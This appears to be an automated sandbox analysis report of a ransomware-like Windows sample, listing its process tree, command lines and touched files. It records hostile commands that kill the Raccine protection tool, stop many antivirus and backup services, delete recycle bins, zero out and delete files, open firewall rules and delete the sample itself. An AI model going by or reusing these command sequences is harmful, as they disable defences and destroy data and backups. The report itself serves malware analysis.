Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | May 12, 2021, 9:57 a.m. | May 12, 2021, 10:04 a.m. |
-
-
taskkill.exe "taskkill" /F /IM RaccineSettings.exe
7960 -
reg.exe "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
8800 -
reg.exe "reg" delete HKCU\Software\Raccine /F
4716 -
schtasks.exe "schtasks" /DELETE /TN "Raccine Rules Updater" /F
2848 -
cmd.exe "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
6200 -
cmd.exe "cmd.exe" /c rd /s /q D:\\$Recycle.bin
4496 -
sc.exe "sc.exe" config Dnscache start= auto
4120 -
sc.exe "sc.exe" config FDResPub start= auto
8772 -
sc.exe "sc.exe" config SQLTELEMETRY start= disabled
6080 -
netsh.exe "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
3180 -
sc.exe "sc.exe" config SSDPSRV start= auto
8248 -
sc.exe "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
4104 -
sc.exe "sc.exe" config SstpSvc start= disabled
2736 -
netsh.exe "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
7304 -
sc.exe "sc.exe" config upnphost start= auto
6688 -
sc.exe "sc.exe" config SQLWriter start= disabled
2000 -
-
net1.exe C:\Windows\system32\net1 start Dnscache /y
8116
-
-
-
net1.exe C:\Windows\system32\net1 start FDResPub /y
5228
-
-
-
net1.exe C:\Windows\system32\net1 stop bedbg /y
4180
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
1808
-
-
-
net1.exe C:\Windows\system32\net1 start SSDPSRV /y
3232
-
-
-
net1.exe C:\Windows\system32\net1 stop avpsus /y
5376
-
-
-
net1.exe C:\Windows\system32\net1 stop EhttpSrv /y
3512
-
-
-
net1.exe C:\Windows\system32\net1 start upnphost /y
5800
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
8388
-
-
-
net1.exe C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
3052
-
-
-
net1.exe C:\Windows\system32\net1 stop MMS /y
7408
-
-
-
net1.exe C:\Windows\system32\net1 stop mfewc /y
5468
-
-
-
net1.exe C:\Windows\system32\net1 stop ekrn /y
4896
-
-
-
net1.exe C:\Windows\system32\net1 stop ccEvtMgr /y
2824
-
-
-
net1.exe C:\Windows\system32\net1 stop mozyprobackup /y
6628
-
-
-
net1.exe C:\Windows\system32\net1 stop BMR Boot Service /y
5208
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQL$TPS /y
5544
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
7696
-
-
-
net1.exe C:\Windows\system32\net1 stop ccSetMgr /y
6908
-
-
-
net1.exe C:\Windows\system32\net1 stop EPSecurityService /y
2996
-
-
-
net1.exe C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
3092
-
-
-
net1.exe C:\Windows\system32\net1 stop EPUpdateService /y
3764
-
-
-
net1.exe C:\Windows\system32\net1 stop SavRoam /y
3116
-
-
-
net1.exe C:\Windows\system32\net1 stop DefWatch /y
3792
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
8716
-
-
-
net1.exe C:\Windows\system32\net1 stop ntrtscan /y
9072
-
-
-
net1.exe C:\Windows\system32\net1 stop RTVscan /y
4692
-
-
-
net1.exe C:\Windows\system32\net1 stop QBFCService /y
6828
-
-
-
net1.exe C:\Windows\system32\net1 stop EsgShKernel /y
7744
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
240
-
-
-
net1.exe C:\Windows\system32\net1 stop VSNAPVSS /y
2804
-
-
-
net1.exe C:\Windows\system32\net1 stop QBIDPService /y
8260
-
-
-
net1.exe C:\Windows\system32\net1 stop PDVFSService /y
5588
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
3572
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamTransportSvc /y
6248
-
-
-
net1.exe C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
1320
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
4700
-
-
-
net1.exe C:\Windows\system32\net1 stop KAVFS /y
2676
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamDeploymentService /y
7844
-
-
-
net1.exe C:\Windows\system32\net1 stop QBCFMonitorService /y
7020
-
-
-
net1.exe C:\Windows\system32\net1 stop ESHASRV /y
3740
-
-
-
net1.exe C:\Windows\system32\net1 stop SQLWriter /y
6416
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamNFSSvc /y
2440
-
-
-
net1.exe C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
3964
-
-
-
net1.exe C:\Windows\system32\net1 stop YooBackup /y
1052
-
-
-
net1.exe C:\Windows\system32\net1 stop SDRSVC /y
8980
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
6184
-
-
-
net1.exe C:\Windows\system32\net1 stop veeam /y
7388
-
-
-
net1.exe C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
8548
-
-
-
net1.exe C:\Windows\system32\net1 stop YooIT /y
7940
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
4772
-
-
-
net1.exe C:\Windows\system32\net1 stop KAVFSGT /y
7908
-
-
-
net1.exe C:\Windows\system32\net1 stop PDVFSService /y
2508
-
-
-
net1.exe C:\Windows\system32\net1 stop BackupExecJobEngine /y
4900
-
-
-
net1.exe C:\Windows\system32\net1 stop zhudongfangyu /y
7524
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamBackupSvc /y
5116
-
-
-
net1.exe C:\Windows\system32\net1 stop FA_Scheduler /y
5012
-
-
-
net1.exe C:\Windows\system32\net1 stop BackupExecVSSProvider /y
3356
-
-
-
net1.exe C:\Windows\system32\net1 stop stc_raw_agent /y
8644
-
-
-
net1.exe C:\Windows\system32\net1 stop BackupExecManagementService /y
3036
-
-
-
net1.exe C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
3328
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
4020
-
-
-
net1.exe C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
1844
-
-
-
net1.exe C:\Windows\system32\net1 stop BackupExecRPCService /y
2092
-
-
-
net1.exe C:\Windows\system32\net1 stop CASAD2DWebSvc /y
2384
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamBrokerSvc /y
7188
-
-
-
net1.exe C:\Windows\system32\net1 stop ReportServer /y
3636
-
-
-
net1.exe C:\Windows\system32\net1 stop kavfsslp /y
5068
-
-
-
net1.exe C:\Windows\system32\net1 stop AcrSch2Svc /y
5700
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQLServerADHelper /y
3912
-
-
-
net1.exe C:\Windows\system32\net1 stop AcronisAgent /y
5232
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
5392
-
-
-
net1.exe C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
2104
-
-
-
net1.exe C:\Windows\system32\net1 stop CAARCUpdateSvc /y
4796
-
-
-
net1.exe C:\Windows\system32\net1 stop sophos /y
5064
-
-
-
net1.exe C:\Windows\system32\net1 stop UI0Detect /y
4296
-
-
-
net1.exe C:\Windows\system32\net1 stop klnagent /y
3108
-
-
-
net1.exe C:\Windows\system32\net1 stop MsDtsServer110 /y
3276
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamCatalogSvc /y
7796
-
-
-
net1.exe C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
2272
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeSA /y
1040
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
8764
-
-
-
net1.exe C:\Windows\system32\net1 stop McAfeeEngineService /y
5184
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
6500
-
-
-
net1.exe C:\Windows\system32\net1 stop POP3Svc /y
2664
-
-
-
net1.exe C:\Windows\system32\net1 stop MsDtsServer /y
5044
-
-
-
net1.exe C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
7732
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
3432
-
-
-
net1.exe C:\Windows\system32\net1 stop macmnsvc /y
3228
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeMGMT /y
2328
-
-
-
net1.exe C:\Windows\system32\net1 stop ReportServer$TPS /y
4024
-
-
-
net1.exe C:\Windows\system32\net1 stop IISAdmin /y
5256
-
-
-
net1.exe C:\Windows\system32\net1 stop McAfeeFramework /y
6116
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamCloudSvc /y
4012
-
-
-
net1.exe C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
6420
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeES /y
7680
-
-
-
net1.exe C:\Windows\system32\net1 stop “Sophos Clean Service” /y
3632
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamMountSvc /y
5084
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
5672
-
-
-
net1.exe C:\Windows\system32\net1 stop SMTPSvc /y
3436
-
-
-
net1.exe C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
2608
-
-
-
net1.exe C:\Windows\system32\net1 stop “Sophos Agent” /y
8692
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
5328
-
-
-
net1.exe C:\Windows\system32\net1 stop masvc /y
1920
-
-
-
net1.exe C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
8476
-
-
-
net1.exe C:\Windows\system32\net1 stop W3Svc /y
7348
-
-
-
net1.exe C:\Windows\system32\net1 stop EraserSvc11710 /y
8872
-
-
-
net1.exe C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
2744
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamDeploymentService /y
3784
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeSRS /y
8048
-
-
-
net1.exe C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
8984
-
-
-
net1.exe C:\Windows\system32\net1 stop “Enterprise Client Service” /y
8544
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamNFSSvc /y
988
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
1292
-
-
-
net1.exe C:\Windows\system32\net1 stop “Sophos Health Service” /y
6476
-
-
-
net1.exe C:\Windows\system32\net1 stop msftesql$PROD /y
1684
-
-
-
net1.exe C:\Windows\system32\net1 stop “SQL Backups /y
1304
-
-
-
net1.exe C:\Windows\system32\net1 stop MBAMService /y
7356
-
-
-
net1.exe C:\Windows\system32\net1 stop MySQL57 /y
3936
-
-
-
net1.exe C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
6988
-
-
-
net1.exe C:\Windows\system32\net1 stop SstpSvc /y
8168
-
-
-
net1.exe C:\Windows\system32\net1 stop MsDtsServer100 /y
6696
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamDeploySvc /y
7824
-
-
-
net1.exe C:\Windows\system32\net1 stop McShield /y
5280
-
-
-
net1.exe C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
6596
-
-
-
net1.exe C:\Windows\system32\net1 stop NetMsmqActivator /y
6804
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeMTA /y
7728
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamRESTSvc /y
7800
-
-
-
net1.exe C:\Windows\system32\net1 stop MSOLAP$TPS /y
2868
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQLSERVER /y
6112
-
-
-
net1.exe C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
6888
-
-
-
net1.exe C:\Windows\system32\net1 stop MySQL80 /y
1896
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeIS /y
6064
-
-
-
net1.exe C:\Windows\system32\net1 stop MBEndpointAgent /y
8196
-
-
-
net1.exe C:\Windows\system32\net1 stop “aphidmonitorservice” /y
4156
-
-
-
net1.exe C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
6048
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
5584
-
-
-
net1.exe C:\Windows\system32\net1 stop McTaskManager /y
5684
-
-
-
net1.exe C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
5620
-
-
-
net1.exe C:\Windows\system32\net1 stop msexchangeadtopology /y
8140
-
-
-
net1.exe C:\Windows\system32\net1 stop “Symantec System Recovery” /y
7236
-
-
-
net1.exe C:\Windows\system32\net1 stop mfefire /y
2456
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamTransportSvc /y
6940
-
-
-
net1.exe C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
3828
-
-
-
net1.exe C:\Windows\system32\net1 stop SamSs /y
1308
-
-
-
net1.exe C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
1136
-
-
-
net1.exe C:\Windows\system32\net1 stop wbengine /y
4788
-
-
-
net1.exe C:\Windows\system32\net1 stop AcrSch2Svc /y
4604
-
-
-
net1.exe C:\Windows\system32\net1 stop OracleClientCache80 /y
6788
-
-
-
net1.exe C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
6784
-
-
-
net1.exe C:\Windows\system32\net1 stop BackupExecRPCService /y
5552
-
-
-
net1.exe C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
6712
-
-
-
net1.exe C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
8484
-
-
-
net1.exe C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
4876
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
3184
-
-
-
net1.exe C:\Windows\system32\net1 stop SepMasterService /y
9152
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
3340
-
-
-
net1.exe C:\Windows\system32\net1 stop mfemms /y
6572
-
-
-
net1.exe C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
1004
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
8092
-
-
-
net1.exe C:\Windows\system32\net1 stop audioendpointbuilder /y
2820
-
-
-
net1.exe C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
4100
-
-
-
net1.exe C:\Windows\system32\net1 stop wbengine /y
8112
-
-
-
net1.exe C:\Windows\system32\net1 stop msexchangeimap4 /y
4420
-
-
-
net1.exe C:\Windows\system32\net1 stop AVP /y
2164
-
-
-
net1.exe C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
6036
-
-
-
net1.exe C:\Windows\system32\net1 stop ShMonitor /y
1240
-
-
-
net1.exe C:\Windows\system32\net1 stop RESvc /y
6756
-
-
-
net1.exe C:\Windows\system32\net1 stop “Sophos MCS Client” /y
3404
-
-
-
net1.exe C:\Windows\system32\net1 stop BackupExecVSSProvider /y
8976
-
-
-
net1.exe C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
6964
-
-
-
net1.exe C:\Windows\system32\net1 stop SQLAgent$PROD /y
4508
-
-
-
net1.exe C:\Windows\system32\net1 stop mfevtp /y
6800
-
-
-
net1.exe C:\Windows\system32\net1 stop ARSM /y
8288
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
7580
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
6368
-
-
-
net1.exe C:\Windows\system32\net1 stop sms_site_sql_backup /y
4928
-
-
-
net1.exe C:\Windows\system32\net1 stop Smcinst /y
7276
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
1544
-
-
-
net1.exe C:\Windows\system32\net1 stop DCAgent /y
5532
-
-
-
net1.exe C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
1836
-
-
-
net1.exe C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
4052
-
-
-
net1.exe C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
8804
-
-
-
net1.exe C:\Windows\system32\net1 stop unistoresvc_1af40a /y
7804
-
-
-
net1.exe C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
9368
-
-
-
net1.exe C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
9344
-
-
-
net1.exe C:\Windows\system32\net1 stop SmcService /y
9500
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
9680
-
-
-
net1.exe C:\Windows\system32\net1 stop “Sophos Message Router” /y
9704
-
-
-
net1.exe C:\Windows\system32\net1 stop swi_filter /y
9796
-
-
notepad.exe "C:\Windows\System32\notepad.exe" C:\Users\test22\Desktop\RESTORE_FILES_INFO.txt
9468 -
-
net1.exe C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
9924
-
-
-
net1.exe C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
10020
-
-
-
net1.exe C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
10192
-
-
-
net1.exe C:\Windows\system32\net1 stop SQLTELEMETRY /y
9320
-
-
cmd.exe "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
10000-
PING.EXE ping 127.0.0.7 -n 3
9380 -
fsutil.exe fsutil file setZeroData offset=0 length=524288 “%s”
8408
-
-
-
net1.exe C:\Windows\system32\net1 stop SQLAgent$TPS /y
9408
-
-
cmd.exe "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\client1122.exe
10128-
choice.exe choice /C Y /N /D Y /T 3
6508
-
-
-
explorer.exe C:\Windows\Explorer.EXE
1848
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
172.217.25.14 | Active | Moloch |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\한글과컴퓨터\한컴 자동 업데이트.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office 도구\VBA 프로젝트용 디지털 인증서.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Python 2.7\Uninstall Python.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office Groove 2007.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\HttpWatch Professional Edition\HttpWatch Help.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Task Scheduler.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Sync Center.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\HttpWatch Professional Edition\HttpWatch Studio.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Windows PowerShell Modules.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Component Services.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk |
file | C:\Users\test22\Links\Desktop.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Chrome.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\한글과컴퓨터\한컴오피스 한글 2010\한컴 사전.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Windows Anytime Upgrade.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\한글과컴퓨터\한컴오피스 한글 2010\한컴 타자연습.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Welcome Center.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Disk Cleanup.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Backup and Restore Center.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\7-Zip\7-Zip Help.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\Get Help.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\Check For Updates.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Remote Desktop Connection.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\7-Zip\7-Zip File Manager.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\한글과컴퓨터\한컴오피스 한글 2010\한컴오피스 한글 2010.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office Publisher 2007.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\한글과컴퓨터\한컴오피스 한글 2010\한컴 문서찾기.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\ShapeCollector.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office Excel 2007.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Sound Recorder.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office 도구\Microsoft Office 2007 언어 설정.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Security Configuration Management.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\한글과컴퓨터\한컴오피스 한글 2010\한컴 기본 설정.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Default Programs.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\displayswitch.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\iSCSI Initiator.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Math Input Panel.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Data Sources (ODBC).lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Python 2.7\IDLE (Python GUI).lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\한컴 사전.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\HttpWatch Professional Edition\Automation Examples.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Mobility Center.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Windows Easy Transfer.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\Windows Journal.lnk |
file | C:\Users\test22\Links\Downloads.lnk |
cmdline | "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\client1122.exe |
cmdline | "schtasks" /DELETE /TN "Raccine Rules Updater" /F |
cmdline | cmd.exe "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\client1122.exe |
cmdline | "cmd.exe" /c rd /s /q D:\\$Recycle.bin |
cmdline | "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s” |
cmdline | "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin |
file | C:\Users\test22\AppData\Local\Temp\client1122.exe |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "RaccineSettings.exe") |
cmdline | "net.exe" stop SDRSVC /y |
cmdline | "net.exe" stop SamSs /y |
cmdline | "net.exe" start SSDPSRV /y |
cmdline | "net.exe" start FDResPub /y |
cmdline | "net.exe" stop SQLAgent$CITRIX_METAFRAME /y |
cmdline | "net.exe" stop MSSQLFDLauncher$SQL_2008 /y |
cmdline | "net.exe" stop Smcinst /y |
cmdline | "net.exe" stop msftesql$PROD /y |
cmdline | "net.exe" stop EPUpdateService /y |
cmdline | "net.exe" stop “Sophos AutoUpdate Service” /y |
cmdline | "net.exe" stop “Sophos Device Control Service” /y |
cmdline | "net.exe" start Dnscache /y |
cmdline | "net.exe" stop MSSQLServerADHelper100 /y |
cmdline | "net.exe" stop BMR Boot Service /y |
cmdline | "net.exe" stop “SQLsafe Filter Service” /y |
cmdline | "net.exe" stop DefWatch /y |
cmdline | "net.exe" stop MSSQL$PRACTTICEBGC /y |
cmdline | "net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y |
cmdline | "net.exe" stop VeeamBackupSvc /y |
cmdline | "net.exe" stop MBAMService /y |
cmdline | "net.exe" stop MSSQL$TPSAMA /y |
cmdline | "net.exe" stop QBIDPService /y |
cmdline | "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes |
cmdline | "net.exe" stop McShield /y |
cmdline | "net.exe" stop sms_site_sql_backup /y |
cmdline | "net.exe" stop QBFCService /y |
cmdline | "net.exe" stop McAfeeDLPAgentService /y |
cmdline | "net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y |
cmdline | "net.exe" stop mfefire /y |
cmdline | "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y |
cmdline | "net.exe" stop QBCFMonitorService /y |
cmdline | "net.exe" stop “Sophos Safestore Service” /y |
cmdline | "net.exe" stop SQLAgent$SBSMONITORING /y |
cmdline | "net.exe" stop MSExchangeIS /y |
cmdline | "net.exe" stop MSSQL$BKUPEXEC /y |
cmdline | "net.exe" stop “Enterprise Client Service” /y |
cmdline | "net.exe" stop SmcService /y |
cmdline | "net.exe" stop EhttpSrv /y |
cmdline | "net.exe" stop MSSQL$SQL_2008 /y |
cmdline | "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\client1122.exe |
cmdline | "schtasks" /DELETE /TN "Raccine Rules Updater" /F |
cmdline | "net.exe" stop audioendpointbuilder /y |
cmdline | "net.exe" stop “Veeam Backup Catalog Data Service” /y |
cmdline | "net.exe" stop bedbg /y |
cmdline | "net.exe" stop “intel(r) proset monitoring service” /y |
cmdline | "net.exe" stop McAfeeFrameworkMcAfeeFramework /y |
cmdline | "net.exe" stop KAVFS /y |
cmdline | "net.exe" stop “Zoolz 2 Service” /y |
cmdline | "net.exe" stop AcronisAgent /y |
cmdline | cmd.exe "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\client1122.exe |
host | 172.217.25.14 |
file | C:\Users\All Users\Microsoft\Microsoft Antimalware\Network Inspection System\Support\NisLog.txt |
file | C:\Users\All Users\Microsoft\Microsoft Antimalware\Network Inspection System\Support\NisLog.txt.reofgv |
file | C:\Windows\Sandboxie.ini |
file | C:\Users\All Users\Microsoft\Microsoft Security Client\Support\Application.etl |
file | C:\Users\All Users\Microsoft\Microsoft Security Client\Support\EppOobe.etl |
file | C:\Users\All Users\Microsoft\Microsoft Security Client\Support\EppSetup.log |
file | C:\Users\All Users\Microsoft\Microsoft Security Client\Support\MSSecurityClient_Setup_4.10.209.0_epp_Uninstall.log |
file | C:\Users\All Users\Microsoft\Microsoft Security Client\Support\EppSetupResult.ini |
file | C:\Users\All Users\Microsoft\Microsoft Security Client\Support\EppSetup.etl |
file | C:\Users\All Users\Microsoft\Microsoft Security Client\Support\MSSecurityClient_Setup_4.10.209.0_epp_Install.log |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk |
cmdline | "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes |
cmdline | "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes |
file | C:\Python27\agent.pyw |
file | C:\tmpzdcjvb\analyzer.py |
file | C:\Windows\bootstat.dat |
file | C:\Python27\tcl\tcl8.5\encoding\iso2022-kr.enc |
file | C:\Python27\tcl\tcl8.5\encoding\iso8859-3.enc |
file | C:\Python27\tcl\tcl8.5\encoding\euc-cn.enc |
file | C:\Python27\tcl\tcl8.5\encoding\cp857.enc |
file | C:\Python27\tcl\tcl8.5\encoding\macIceland.enc |
file | C:\Python27\tcl\tcl8.5\encoding\macCyrillic.enc |
file | C:\Python27\tcl\tcl8.5\encoding\iso8859-8.enc |
file | C:\Python27\tcl\tcl8.5\encoding\cp860.enc |
file | C:\Python27\tcl\tcl8.5\encoding\iso8859-10.enc |
file | C:\Python27\tcl\tcl8.5\encoding\ksc5601.enc |
